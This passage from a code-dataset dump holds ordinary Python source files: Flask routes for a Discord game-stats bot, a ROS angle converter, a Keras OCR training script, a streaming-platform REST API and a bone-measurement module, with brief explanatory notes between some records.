name), (\"regular\", \"got\"),\n (\"feed-award\", \"Big Doinks\"), (\"regular\", \"for\")\n ]\n count = 0\n for reason, char in zip(doinks_reasons, doinks_str):\n if char == \"1\":\n if count != 0:\n response_list.append((\"regular\", \"and\"))\n response_list.append((\"bold\", reason))\n count += 1\n\n return response_list\n\ndef get_stat_desc(game, game_data, best_stats, worst_stats):\n game_id, _, disc_id, _, _, _ = game_data\n responses = []\n stats = get_stat_quantity_descriptions(game)\n for i, stat_list in enumerate((best_stats, worst_stats)):\n for stat, person_id, stat_value, stat_game_id in stat_list:\n if stat_game_id == game_id and person_id == disc_id: # Best/worst 
stat was beaten.\n                stat_fmt = api_util.round_digits(stat_value)\n                stat_name_fmt = stat.replace(\"_\", \" \")\n                readable_stat = stats[stat][i] + \" \" + stat_name_fmt\n                name = app_util.discord_request(\"func\", \"get_discord_nick\", disc_id)\n                response_list = [\n                    (\"name\", name), (\"regular\", \"got the\"), (\"feed-award\", readable_stat),\n                    (\"regular\", \"ever with\"), (\"bold\", f\"{stat_fmt} {stat_name_fmt}\")\n                ]\n                responses.append(response_list)\n    return responses\n\ndef get_game_desc(game, game_data, best_stats, worst_stats):\n    duration = format_duration_approx(game_data[1])\n    return (\n        get_intfar_desc(game, game_data),\n        get_doinks_desc(game, game_data),\n        get_stat_desc(game, game_data, best_stats, worst_stats),\n        duration\n    )\n\ndef get_bet_desc(game, bet_data):\n    betting_handler = flask.current_app.config[\"BET_HANDLERS\"][game]\n    disc_id, _, guild_id, timestamp, amounts, events, targets, _, result, payout = bet_data\n    disc_data = app_util.discord_request(\"func\", [\"get_discord_nick\", \"get_guild_name\"], [disc_id, guild_id])\n    name = disc_data[0]\n    guild = disc_data[1]\n    result_desc = \"Won\" if result == 1 else \"Lost\"\n    tokens = (\n        api_util.format_tokens_amount(payout) if result == 1\n        else api_util.format_tokens_amount(sum(amounts))\n    )\n    response_list = [\n        (\"name\", name), (\"regular\", result_desc), (\"bold\", f\"{tokens} GBP\"),\n        (\"regular\", \"in\"), (\"bold\", guild), (\"regular\", \"by betting on\")\n    ]\n    for i, (event, target) in enumerate(zip(events, targets)):\n        target_name = (None if target is None\n                       else app_util.discord_request(\"func\", \"get_discord_nick\", target))\n        dynamic_desc = betting_handler.get_dynamic_bet_desc(event, target_name)\n        if i != 0:\n            response_list.append((\"regular\", \" and \"))\n        response_list.append((\"bold\", dynamic_desc))\n\n    return response_list, format_duration_approx(timestamp)\n\ndef get_feed_data(game, database, feed_length=10):\n    bets = database.get_bets(game, False)\n\n    all_bets = []\n    for disc_id in bets:\n        for bet_data in bets[disc_id]:\n            all_bets.append((disc_id,) + bet_data)\n\n    all_bets.sort(key=lambda x: x[3])\n\n    all_game_data = database.get_recent_intfars_and_doinks(game)\n    best_stats_ever = []\n    worst_stats_ever = []\n\n    stats = get_stat_quantity_descriptions(game)\n\n    for best in (True, False):\n        for stat in stats:\n            maximize = not ((stat != \"deaths\") ^ best)\n            stat_id, stat_value, game_id = database.get_most_extreme_stat(game, stat, maximize)\n            if best:\n                best_stats_ever.append((stat, stat_id, stat_value, game_id))\n            else:\n                worst_stats_ever.append((stat, stat_id, stat_value, game_id))\n\n    feed_data = []\n    bets_index = len(all_bets) - 1\n    games_index = len(all_game_data) - 1\n\n    while len(feed_data) < feed_length:\n        game_data = all_game_data[games_index]\n        bet_data = all_bets[bets_index]\n        game_timestamp = game_data[1]\n        bet_timestamp = bet_data[3]\n        if game_timestamp > bet_timestamp:\n            intfar_desc, doinks_desc, stat_descs, duration = get_game_desc(\n                game, game_data, best_stats_ever, worst_stats_ever\n            )\n            if intfar_desc is not None:\n                feed_data.append((intfar_desc, duration))\n            if doinks_desc is not None:\n                feed_data.append((doinks_desc, duration))\n            for stat_desc in stat_descs:\n                feed_data.append((stat_desc, duration))\n\n            games_index -= 1\n        else:\n            bet_desc, duration = get_bet_desc(game, bet_data)\n            if bet_desc is not None:\n                feed_data.append((bet_desc, duration))\n            bets_index -= 1\n\n    return feed_data\n\n@start_page.route(\"/\")\n@start_page.route(\"/index\")\ndef index():\n    game = 
\n@start_page.route(\"/\")\n@start_page.route(\"/index\")\ndef index():\n    game = flask.current_app.config[\"CURRENT_GAME\"]\n    database = flask.current_app.config[\"DATABASE\"]\n    curr_month = api_util.current_month()\n\n    feed_descs = get_feed_data(game, database, feed_length=25)\n\n    intfar_all_data = []\n    intfar_month_data = []\n    for disc_id in database.users[game]:\n        games_played, intfar_reason_ids = database.get_intfar_stats(game, disc_id)\n        games_played_monthly, intfar_reason_ids_monthly = database.get_intfar_stats(game, disc_id, True)\n        pct_intfar = (\n            0 if games_played == 0\n            else len(intfar_reason_ids) / games_played * 100\n        )\n        pct_intfar_monthly = (\n            0 if games_played_monthly == 0\n            else len(intfar_reason_ids_monthly) / games_played_monthly * 100\n        )\n\n        intfar_all_data.append(\n            (disc_id, games_played, len(intfar_reason_ids), f\"{pct_intfar:.2f}\")\n        )\n        intfar_month_data.append(\n            (disc_id, games_played_monthly, len(intfar_reason_ids_monthly), f\"{pct_intfar_monthly:.2f}\")\n        )\n\n    avatars = app_util.discord_request(\"func\", \"get_discord_avatar\", None)\n    if avatars:\n        avatars = [\n            flask.url_for(\"static\", filename=avatar.replace(\"app/static/\", \"\"))\n            for avatar in avatars\n        ]\n    nicknames = app_util.discord_request(\"func\", \"get_discord_nick\", None)\n\n    intfar_all_data = [\n        (x,) + y + (z,)\n        for (x, y, z) in zip(nicknames, intfar_all_data, avatars)\n    ]\n    intfar_month_data = [\n        (x,) + y + (z,)\n        for (x, y, z) in zip(nicknames, intfar_month_data, avatars)\n    ]\n\n    # The percentage was formatted into a string above, so compare it numerically here.\n    intfar_all_data.sort(key=lambda x: (x[3], float(x[4])), reverse=True)\n    intfar_month_data.sort(key=lambda x: (x[3], float(x[4])), reverse=True)\n\n    return app_util.make_template_context(\n        \"index.html\",\n        game=game,\n        curr_month=curr_month,\n        feed_descs=feed_descs,\n        intfar_all=intfar_all_data,\n        intfar_month=intfar_month_data\n    )\n\n@start_page.route(\"active_game\", methods=[\"GET\"])\ndef get_active_game_info():\n    game = flask.current_app.config[\"CURRENT_GAME\"]\n    logged_in_user = app_util.get_user_details()[0]\n\n    if logged_in_user is None:\n        return app_util.make_json_response(\"Error: You need to be verified to access this data.\", 401)\n\n    json_response = app_util.get_game_info(game)\n\n    shown_games = app_util.filter_hidden_games(json_response, logged_in_user)\n\n    if shown_games == []:\n        return app_util.make_json_response(\"No active game\", 404)\n\n    return app_util.make_json_response(shown_games, 200)\n\n@start_page.route(\"game_started\", methods=[\"POST\"])\ndef active_game_started():\n    game = flask.current_app.config[\"CURRENT_GAME\"]\n    data = flask.request.form\n    conf = flask.current_app.config[\"APP_CONFIG\"]\n\n    secret = data.get(\"secret\")\n\n    # Verify that the request contains the Discord App Token (that is only known by us).\n    if secret != conf.discord_token:\n        return flask.make_response((\"Error: Unauthorized access.\", 401))\n\n    saved_data = dict(data)\n    del saved_data[\"secret\"]\n    saved_data[\"start\"] = float(saved_data[\"start\"])\n    saved_data[\"map_id\"] = int(saved_data[\"map_id\"])\n    saved_data[\"guild_id\"] = int(saved_data[\"guild_id\"])\n\n    flask.current_app.config[\"ACTIVE_GAME\"][saved_data[\"guild_id\"]][game] = saved_data\n    return flask.make_response((\"Success! Active game ID updated.\", 200))
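index() above stores the Int-Far percentage as a pre-formatted string, which is why the sort keys convert it back with float(): comparing the strings directly would be lexicographic and order "9.43" above "12.50". A minimal illustration:

pcts = ["9.43", "12.50", "100.00"]
print(sorted(pcts, reverse=True))             # ['9.43', '12.50', '100.00'] - string order, wrong
print(sorted(pcts, key=float, reverse=True))  # ['100.00', '12.50', '9.43'] - numeric order, intended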
\n\n@start_page.route(\"game_ended\", methods=[\"POST\"])\ndef active_game_ended():\n    game = flask.current_app.config[\"CURRENT_GAME\"]\n    data = flask.request.form\n    conf = flask.current_app.config[\"APP_CONFIG\"]\n\n    secret = data.get(\"secret\")\n\n    # Verify that the request contains the Discord App Token (that is only known by us).\n    if secret != conf.discord_token:\n        return flask.make_response((\"Error: Unauthorized access.\", 401))\n\n    flask.current_app.config[\"ACTIVE_GAME\"][int(data[\"guild_id\"])][game] = None\n\n    if flask.current_app.config[\"GAME_PREDICTION\"].get(int(data[\"game_id\"])) is not None:\n        remove(\"resources/predictions_temp.json\")\n\n    flask.current_app.config[\"GAME_PREDICTION\"][int(data[\"game_id\"])] = None\n\n    return flask.make_response((\"Success! Active game ID deleted.\", 200))\n\n@start_page.route(\"/heartbeat\")\ndef heartbeat():\n    if flask.current_app.config[\"EXIT_CODE\"] != 0:\n        return app_util.make_text_response(\"Restarting\", 503)\n\n    return app_util.make_text_response(\"Alive and kicking!\", 200)\n\n@start_page.route(\"/restart\", methods=[\"POST\"])\ndef restart():\n    logged_in_user = app_util.get_user_details()[0]\n\n    if logged_in_user is None or logged_in_user != ADMIN_DISC_ID:\n        return app_util.make_text_response(\"Unauthorized Access.\", 401)\n\n    flask.current_app.config[\"EXIT_CODE\"] = 2\n\n    exit(2)\n\ndef save_prediction_to_file(prediction, game_duration):\n    filename = \"resources/predictions_temp.json\"\n    if exists(filename):\n        snapshot_json = json.load(open(filename, \"r\", encoding=\"utf-8\"))\n    else:\n        snapshot_json = {\"predictions\": []}\n\n    snapshot_json[\"predictions\"].append({\n        \"timestamp\": game_duration,\n        \"prediction\": prediction\n    })\n\n    json.dump(snapshot_json, open(filename, \"w\", encoding=\"utf-8\"), indent=4)\n\n@start_page.route(\"/update_prediction\", methods=[\"POST\"])\ndef set_prediction():\n    data = flask.request.form\n    conf = flask.current_app.config[\"APP_CONFIG\"]\n\n    secret = data.get(\"secret\")\n\n    # Verify that the request contains the Discord App Token (that is only known by us).\n    if secret != conf.discord_token:\n        return flask.make_response((\"Error: Unauthorized access.\", 401))\n\n    game_id = int(data[\"game_id\"])\n\n    logger.info(f\"Updated game prediction: {data['pct_win']}% chance of winning.\")\n\n    save_prediction_to_file(data[\"pct_win\"], int(data[\"game_duration\"]))\n\n    flask.current_app.config[\"GAME_PREDICTION\"][game_id] = data[\"pct_win\"]\n\n    return flask.make_response((\"Success! Game prediction updated.\", 200))\n\n@start_page.route(\"/prediction\", methods=[\"GET\"])\ndef get_prediction():\n    data = flask.request.args\n    game_id = data.get(\"game_id\")\n\n    if game_id is None:\n        return app_util.make_json_response(\"Error: Missing parameter 'game_id'.\", 400)\n\n    pct_win = flask.current_app.config[\"GAME_PREDICTION\"].get(int(game_id))\n\n    if pct_win is None:\n        return app_util.make_json_response(\"Error: No prediction exists.\", 404)\n\n    return app_util.make_json_response(pct_win, 200)\n","repo_name":"mhso/IntFar","sub_path":"app/routes/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":13372,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"}
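save_prediction_to_file above appends one snapshot per update, so over a game the temp file grows into the full win-probability history. A short usage sketch (the values are made up for illustration):

save_prediction_to_file("48.2", 120)
save_prediction_to_file("55.7", 180)
# resources/predictions_temp.json now contains:
# {"predictions": [{"timestamp": 120, "prediction": "48.2"},
#                  {"timestamp": 180, "prediction": "55.7"}]}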
{"seq_id":"5739264190","text":"#!/usr/bin/env python3\nimport rospy\nfrom arduinobot_controller.srv import AnglesConverter, AnglesConverterResponse\nimport math\n\n\"\"\"\nCallback function for the radians_to_degrees service. This function receives the positions of the\narm in radians and converts them to degrees.\n\"\"\"\ndef convert_radians_to_degrees(req):\n    res = AnglesConverterResponse()\n    res.base = int(((req.base+(math.pi/2))*180)/math.pi)\n    res.shoulder = 180-int(((req.shoulder+(math.pi/2))*180)/math.pi)\n    res.elbow = int(((req.elbow+(math.pi/2))*180)/math.pi)\n    res.gripper = int(((-req.gripper)*180)/(math.pi/2))\n\n    return res\n\n\"\"\"\nCallback function for the degrees_to_radians service. This function receives the positions of the\narm in degrees and converts them to radians.\n\"\"\"\ndef convert_degrees_to_radians(req):\n    res = AnglesConverterResponse()\n    res.base = ((math.pi*req.base) - ((math.pi/2)*180))/180\n    res.shoulder = (((180-req.shoulder)*math.pi)-((math.pi/2)*180))/180\n    res.elbow = ((math.pi*req.elbow) - ((math.pi/2)*180))/180\n    res.gripper = -((math.pi/2)*req.gripper)/180\n\n    return res\n\nif __name__ == '__main__':\n    # Initialize a ROS node named angles_converter\n    rospy.init_node(\"angles_converter\")\n\n    # Initialize a service to convert radians to degrees and vice versa\n    radians_to_degrees = rospy.Service(\"radians_to_degrees\", AnglesConverter, convert_radians_to_degrees)\n    degrees_to_radians = rospy.Service(\"degrees_to_radians\", AnglesConverter, convert_degrees_to_radians)\n    \n    # keeps the node up and running\n    rospy.spin()\n\n","repo_name":"dmagill89/arduinobot","sub_path":"src/arduinobot_controller/scripts/angles_converter.py","file_name":"angles_converter.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
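The converters above map the arm's symmetric radian range [-pi/2, pi/2] onto a servo's [0, 180] degree range (the gripper uses its own scale). A quick round-trip check of the base-joint formulas, runnable on its own:

import math

to_deg = lambda rad: int(((rad + (math.pi / 2)) * 180) / math.pi)     # as in convert_radians_to_degrees
to_rad = lambda deg: ((math.pi * deg) - ((math.pi / 2) * 180)) / 180  # as in convert_degrees_to_radians

print(to_deg(0.0))           # 90 -> a centered joint maps to mid-servo
print(to_deg(-math.pi / 2))  # 0  -> one end of the servo range
print(to_rad(to_deg(1.0)))   # ~0.99, close to 1.0 up to the int() truncation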
{"seq_id":"9322726093","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Mar 30 01:27:41 2020\n\n@author: GaborSarosi\n\"\"\"\n\nimport tensorflow as tf\nimport keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Conv2D, Flatten, Dropout, BatchNormalization, MaxPool2D\nfrom keras.utils import to_categorical\nimport pandas as pd\nimport numpy as np\nfrom helper import Gimatrias as gm\nfrom datetime import datetime\nimport os\nfrom keras.optimizers import RMSprop\nfrom keras.callbacks import ReduceLROnPlateau\nfrom keras.preprocessing.image import ImageDataGenerator\n\n\n\ntrain_df = pd.read_csv(f'dataset/train/train_flat_gim.csv', header=None)\ntest_df = pd.read_csv(f'dataset/test/test_flat_gim.csv', header=None)\n\ntrain_labels = train_df.loc[:,0].values\ntrain_images = train_df.loc[:,1:576].values\n\ntest_labels = test_df.loc[:,0].values\ntest_images = test_df.loc[:,1:576].values\n\ntrain_images = np.expand_dims(train_images, axis=0)\ntest_images = np.expand_dims(test_images, axis=0)\n\ntrain_size = train_labels.size\n\ntrain_images = train_images.reshape(train_labels.size, 24, 24, 1)\ntest_images = test_images.reshape(test_labels.size, 24, 24, 1)\n\ntrain_labels = to_categorical(train_labels)\ntest_labels = to_categorical(test_labels)\n\n#needed only because test data does not have paspas, so it is only 1002 long\n#TODO: add paspas to test_data!!!!! and then remove this line\ntest_labels = np.hstack((test_labels, np.zeros((test_labels.shape[0], 1), dtype=test_labels.dtype)))\n\nset_image_dim_ordering=\"th\"\n\n#<><><><> MODEL <><><><>\n\nmodel = keras.Sequential()\n#model.add(keras.layers.InputLayer(()))\n#model.add(Conv2D(64, kernel_size=3, activation='relu', input_shape=(24,24,1)))\n#model.add(Conv2D(64, kernel_size=3, activation='relu'))\n#model.add(MaxPooling2D(pool_size=(2, 2)))\n#model.add(Conv2D(128, kernel_size=3, activation='relu'))\n#model.add(Conv2D(128, kernel_size=3, activation='relu'))\n#model.add(MaxPooling2D(pool_size=(2, 2)))\n#model.add(Dropout(0.25))\n#model.add(Flatten())\n#model.add(Dense(256, activation='relu'))\n#model.add(Dropout(0.5))\n#model.add(Dense(1003, activation=\"softmax\"))\n\n\nmodel.add(Conv2D(filters=32, kernel_size=(5,5), padding='Same', activation='relu', input_shape=(24,24,1)))\nmodel.add(BatchNormalization())\nmodel.add(Conv2D(filters=32, kernel_size=(5,5), padding='Same', activation='relu'))\nmodel.add(BatchNormalization())\nmodel.add(MaxPool2D(pool_size=(2,2)))\nmodel.add(Dropout(0.25))\n\nmodel.add(Conv2D(filters=64, kernel_size=(3,3), padding='Same', activation='relu'))\nmodel.add(BatchNormalization())\nmodel.add(Conv2D(filters=64, kernel_size=(3,3), padding='Same', activation='relu'))\nmodel.add(BatchNormalization())\nmodel.add(MaxPool2D(pool_size=(2,2), strides=(2,2)))\nmodel.add(Dropout(0.25))\n\nmodel.add(Flatten())\nmodel.add(Dense(256, activation='relu'))\nmodel.add(BatchNormalization())\nmodel.add(Dense(256, activation='relu'))\nmodel.add(BatchNormalization())\nmodel.add(Dropout(0.5))\nmodel.add(Dense(1003, activation='softmax'))\n\nepochs = 30\nbatch_size = 64\n\noptimizer = RMSprop(lr=0.001, rho=0.9, epsilon=1e-08, decay=0.0)\n\nmodel.compile(optimizer = optimizer , loss = \"categorical_crossentropy\", metrics=[\"accuracy\"])\n#model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])\n\nlearning_rate_reduction = ReduceLROnPlateau(monitor='val_accuracy', \n                                            patience=2, \n                                            verbose=1, \n                                            factor=0.5, \n                                            min_lr=0.00001)\n\nmodel.summary()\n\nimage_gen=ImageDataGenerator(rotation_range=10,width_shift_range=0.1,height_shift_range=0.1,shear_range=0.1,zoom_range=0.1,horizontal_flip=False,vertical_flip=False,fill_mode='nearest')\n\nmodel.fit_generator(image_gen.flow(train_images, train_labels, batch_size=batch_size), epochs=epochs, validation_data = (test_images, test_labels), callbacks = [learning_rate_reduction])\n\n\n#model.fit(train_images, train_labels, epochs=30)\n\n#<><><><> TEST SET <><><><>\ntest_loss, test_acc = model.evaluate(test_images, test_labels, verbose=2)\n\nprint('\\nTest loss:', test_loss)\nprint('Test accuracy:', test_acc, '\\n')\n\n#<><><><> PREDICTIONS <><><><>\nprobability_model = keras.Sequential([model, keras.layers.Softmax()])\n\npredictions = probability_model.predict(test_images)\n\nnow = datetime.now()\ndt_string = now.strftime(\"%Y-%m-%d-%H-%M-%S\")\n\n\n#<><><><> FINDING THE WRONG PREDICTIONS <><><><> \ndef evaluate_mistakes(save_to_csv: bool = False, print_to_screen: bool = True):\n#    #if save_to_csv:\n#    csvfile = csv.writer(open('evaluate/test_mistakes'+dt_string+'.csv', 'w', newline=''))\n#    fieldnames = ['Reality', 'Prediction']\n#    writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n#    csvfile.writeheader()\n    print(\"\\n ---- WRONG PREDICTIONS ---- \")\n    num_mistakes = 0    \n    for idx, pred in enumerate(predictions):\n        label_at_idx = np.argmax(test_labels[idx])\n        if not np.argmax(predictions[idx]) == label_at_idx:\n            test_example = 
gm.full_name_of(label_at_idx)\n predicted = gm.full_name_of(np.argmax(predictions[idx]))\n if print_to_screen:\n print(idx, 'test:', test_example, 'prediction:', predicted)\n# if save_to_csv:\n# row = [test_example, predicted]\n# csvfile.writerow(row)\n num_mistakes = num_mistakes+1\n print('Number of mistakes = ', num_mistakes, '\\n')\n\n#<><><><> SAVING THE MODEL <><><><>\ndef save_my_weights(num_mistakes):\n modelname = \"rashinet\" + str(num_mistakes) + \"_\" + dt_string\n os.chdir(\"models\")\n os.mkdir(modelname)\n os.chdir(modelname)\n \n model_yaml = model.to_yaml()\n with open(modelname+\".yaml\", \"w\") as yaml_file:\n yaml_file.write(model_yaml)\n \n model_json = model.to_json()\n with open(modelname+\".json\", \"w\") as json_file:\n json_file.write(model_json)\n \n h5name = modelname + '.h5'\n model.save_weights(h5name)\n \n \nevaluate_mistakes(True, True)\n#save_my_weights(num_mistakes)\n\ndef freeze_session(session, keep_var_names=None, output_names=None, clear_devices=True):\n \"\"\"\n Freezes the state of a session into a pruned computation graph.\n\n Creates a new computation graph where variable nodes are replaced by\n constants taking their current value in the session. The new graph will be\n pruned so subgraphs that are not necessary to compute the requested\n outputs are removed.\n @param session The TensorFlow session to be frozen.\n @param keep_var_names A list of variable names that should not be frozen,\n or None to freeze all the variables in the graph.\n @param output_names Names of the relevant graph outputs.\n @param clear_devices Remove the device directives from the graph for better portability.\n @return The frozen graph definition.\n \"\"\"\n graph = session.graph\n with graph.as_default():\n freeze_var_names = list(set(v.op.name for v in tf.global_variables()).difference(keep_var_names or []))\n output_names = output_names or []\n output_names += [v.op.name for v in tf.global_variables()]\n input_graph_def = graph.as_graph_def()\n if clear_devices:\n for node in input_graph_def.node:\n node.device = \"\"\n frozen_graph = tf.graph_util.convert_variables_to_constants(\n session, input_graph_def, output_names, freeze_var_names)\n return frozen_graph\n","repo_name":"sarosi/RashiOCR","sub_path":"nn.py","file_name":"nn.py","file_ext":"py","file_size_in_byte":7471,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"8206696205","text":"from flask_restx import Api, Resource, reqparse, Namespace\nfrom flask import request\n\nfrom classes import Stream\nfrom classes import apikey\nfrom classes import topics\nfrom classes import settings\nfrom classes import upvotes\nfrom classes.shared import db\n\nfrom functions import cachedDbCalls\n\napi = Namespace(\"stream\", description=\"Stream Related Queries and Functions\")\n\nstreamParserPut = reqparse.RequestParser()\nstreamParserPut.add_argument(\"streamName\", type=str)\nstreamParserPut.add_argument(\"topicID\", type=int)\n\nstreamSearchPost = reqparse.RequestParser()\nstreamSearchPost.add_argument(\"term\", type=str)\n\n\n@api.route(\"/\")\nclass api_1_ListStreams(Resource):\n def get(self):\n \"\"\"\n Returns a List of All Active Streams\n \"\"\"\n results = []\n sysSettings = cachedDbCalls.getSystemSettings()\n\n streamList = (\n Stream.Stream.query.filter_by(active=True)\n .with_entities(\n Stream.Stream.id,\n Stream.Stream.uuid,\n Stream.Stream.startTimestamp,\n Stream.Stream.linkedChannel,\n Stream.Stream.streamName,\n Stream.Stream.topic,\n 
Stream.Stream.currentViewers,\n Stream.Stream.active,\n Stream.Stream.rtmpServer,\n )\n .all()\n )\n for stream in streamList:\n channelQuery = cachedDbCalls.getChannel(stream.linkedChannel)\n if channelQuery.private != True:\n rtmpQuery = settings.rtmpServer.query.filter_by(\n id=stream.rtmpServer\n ).with_entities(\n settings.rtmpServer.id,\n settings.rtmpServer.active,\n settings.rtmpServer.address\n ).first()\n upvotesQueryCount = upvotes.streamUpvotes.query.filter_by(\n streamID=stream.id\n ).count()\n\n streamURL = \"\"\n if sysSettings.adaptiveStreaming is True:\n streamURL = \"/live-adapt/\" + channelQuery.channelLoc + \".m3u8\"\n else:\n streamURL = \"/live/\" + channelQuery.channelLoc + \"/index.m3u8\"\n\n entry = {\n \"id\": stream.id,\n \"uuid\": stream.uuid,\n \"startTimestamp\": str(stream.startTimestamp),\n \"channelID\": stream.linkedChannel,\n \"channelEndpointID\": channelQuery.channelLoc,\n \"owningUser\": channelQuery.owningUser,\n \"streamPage\": \"/view/\" + channelQuery.channelLoc + \"/\",\n \"streamURL\": streamURL,\n \"streamName\": stream.streamName,\n \"thumbnail\": \"/stream-thumb/\" + channelQuery.channelLoc + \".png\",\n \"gifLocation\": \"/stream-thumb/\" + channelQuery.channelLoc + \".gif\",\n \"topic\": stream.topic,\n \"rtmpServer\": rtmpQuery.address,\n \"currentViewers\": stream.currentViewers,\n \"totalViewers\": stream.currentViewers,\n \"active\": stream.active,\n \"upvotes\": upvotesQueryCount,\n }\n results.append(entry)\n\n db.session.commit()\n return {\"results\": results}\n\n\n@api.route(\"/<int:streamID>\")\n@api.doc(params={\"streamID\": \"ID Number for the Stream\"})\nclass api_1_ListStream(Resource):\n def get(self, streamID):\n \"\"\"\n Returns Info on a Single Active Streams\n \"\"\"\n streamList = Stream.Stream.query.filter_by(active=True, id=streamID).all()\n db.session.commit()\n return {\"results\": [ob.serialize() for ob in streamList]}\n # Channel - Change Channel Name or Topic ID\n\n @api.expect(streamParserPut)\n @api.doc(security=\"apikey\")\n @api.doc(responses={200: \"Success\", 400: \"Request Error\"})\n def put(self, streamID):\n \"\"\"\n Change a Streams's Name or Topic\n \"\"\"\n if \"X-API-KEY\" in request.headers:\n requestAPIKey = apikey.apikey.query.filter_by(\n key=request.headers[\"X-API-KEY\"]\n ).first()\n if requestAPIKey is not None:\n if requestAPIKey.isValid():\n streamQuery = Stream.Stream.query.filter_by(\n active=True, id=int(streamID)\n ).first()\n if streamQuery is not None:\n channelQuery = cachedDbCalls.getChannel(\n streamQuery.linkedChannel\n )\n if channelQuery.owningUser == requestAPIKey.userID:\n args = streamParserPut.parse_args()\n if \"streamName\" in args:\n if args[\"streamName\"] is not None:\n streamQuery.streamName = args[\"streamName\"]\n if \"topicID\" in args:\n if args[\"topicID\"] is not None:\n possibleTopics = topics.topics.query.filter_by(\n id=int(args[\"topicID\"])\n ).first()\n if possibleTopics is not None:\n streamQuery.topic = int(args[\"topicID\"])\n db.session.commit()\n return {\"results\": {\"message\": \"Stream Updated\"}}, 200\n return {\"results\": {\"message\": \"Request Error\"}}, 400\n\n\n@api.route(\"/search\")\nclass api_1_SearchStreams(Resource):\n # Streams - Search Live Streams\n @api.expect(streamSearchPost)\n @api.doc(responses={200: \"Success\", 400: \"Request Error\"})\n def post(self):\n \"\"\"\n Searches Stream Names and Metadata and returns Name and Link\n \"\"\"\n sysSettings = cachedDbCalls.getSystemSettings()\n args = streamSearchPost.parse_args()\n 
returnArray = []\n if \"term\" in args:\n returnArray = cachedDbCalls.searchStreams(args[\"term\"])\n return {\"results\": returnArray, \"adaptive\": sysSettings.adaptiveStreaming}\n else:\n return {\"results\": {\"message\": \"Request Error\"}}, 400\n","repo_name":"Open-Streaming-Platform/open-streaming-platform","sub_path":"blueprints/apis/stream_ns.py","file_name":"stream_ns.py","file_ext":"py","file_size_in_byte":6312,"program_lang":"python","lang":"en","doc_type":"code","stars":91,"dataset":"github-code","pt":"48"} +{"seq_id":"44404700030","text":"# python libraries\nimport logging\nfrom shapely.geometry import Polygon\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as patches\n\nfrom core_alg.base import Bone\nfrom core_alg.utilities import bone_region_util\n\ntml_coeff = 0.995\ntpb_coeff = 0.985\n\n\ndef get_tml(alpha_shape, show_figure, left_bone_points_ordered, right_bone_points_ordered):\n (min_x, min_y, max_x, max_y) = alpha_shape.exterior.bounds\n x_length = max_x - min_x\n y_length = max_y - min_y\n\n # left-upper box\n left_upper_box = Polygon([(min_x, min_y + y_length * 0.75), (min_x, max_y), (min_x + x_length / 10, max_y), (min_x + x_length / 10, min_y + y_length * 0.75)])\n left_upper_bone = alpha_shape.intersection(left_upper_box)\n (min_x_left_upper, _, _, _) = left_upper_bone.exterior.bounds\n\n # left-lower box\n left_lower_box = Polygon([(min_x, min_y), (min_x, min_y + y_length * 0.25), (min_x + x_length / 10, min_y + y_length * 0.25),\n (min_x + x_length / 10, min_y)])\n left_lower_bone = alpha_shape.intersection(left_lower_box)\n (min_x_left_lower, _, _, _) = left_lower_bone.exterior.bounds\n\n poi_x = min(min_x_left_upper, min_x_left_lower)\n tml = max_x - poi_x\n\n if show_figure:\n # most left point, 1st POIs\n p_left = []\n for i in range(len(left_bone_points_ordered)):\n if left_bone_points_ordered[i][0] == poi_x:\n p_left = left_bone_points_ordered[i]\n break\n\n # most right point, 2nd POIs\n p_right = []\n right_most_idx = 0\n for i in range(len(right_bone_points_ordered)):\n if right_bone_points_ordered[i][0] == max_x:\n p_right = right_bone_points_ordered[i]\n break\n\n fig, ax = plt.subplots()\n x, y = alpha_shape.exterior.xy\n ax.plot(x, y)\n ax.plot(p_left[0], p_left[1], 'r+')\n ax.plot(p_right[0], p_right[1], 'r+')\n\n p_rec_left_bottom = [min_x - 20, min_y + y_length * 0.25]\n rect = patches.Rectangle((p_rec_left_bottom[0], p_rec_left_bottom[1]), 40, y_length * 0.5, linestyle='dashed',\n linewidth=0.5, edgecolor='b', facecolor='none')\n ax.add_patch(rect)\n ax.set_aspect('equal')\n plt.show()\n\n tml /= tml_coeff\n return tml\n\n\ndef get_tpb(alpha_shape, show_figure, left_bone, left_bone_points_ordered):\n (min_x, min_y, max_x, max_y) = alpha_shape.exterior.bounds\n tpb = max_y - min_y\n\n if show_figure:\n (left_bone_min_x, left_bone_min_y, left_bone_max_x,\n left_bone_max_y) = left_bone.exterior.bounds\n # top point, 1st POIs\n p_top = []\n for i in range(len(left_bone_points_ordered)):\n if left_bone_points_ordered[i][1] == left_bone_max_y:\n p_top = left_bone_points_ordered[i]\n break\n\n # bottom point, 1st POIs\n p_bottom = []\n for i in range(len(left_bone_points_ordered)):\n if left_bone_points_ordered[i][1] == left_bone_min_y:\n p_bottom = left_bone_points_ordered[i]\n break\n\n fig, ax = plt.subplots()\n x, y = alpha_shape.exterior.xy\n ax.plot(x, y)\n ax.plot(p_top[0], p_top[1], 'r+')\n ax.plot(p_bottom[0], p_bottom[1], 'r+')\n ax.set_aspect('equal')\n plt.show()\n\n tpb /= tpb_coeff\n return tpb\n\n\ndef get_measurement(tibia, 
show_figure):\n    logging.info('Start measuring tibia')\n    left_region, left_region_points_ordered = bone_region_util.get_left_region(\n        tibia.alpha_shape)\n    _, right_region_points_ordered = bone_region_util.get_right_region(\n        tibia.alpha_shape)\n    tibia.tml = get_tml(tibia.alpha_shape, show_figure, left_region_points_ordered, right_region_points_ordered)\n    tibia.tpb = get_tpb(tibia.alpha_shape, show_figure, left_region, left_region_points_ordered)\n","repo_name":"zilipp/CSE260BoneProjectMaterial","sub_path":"web/core_alg/scan/measure_tibia.py","file_name":"measure_tibia.py","file_ext":"py","file_size_in_byte":3884,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
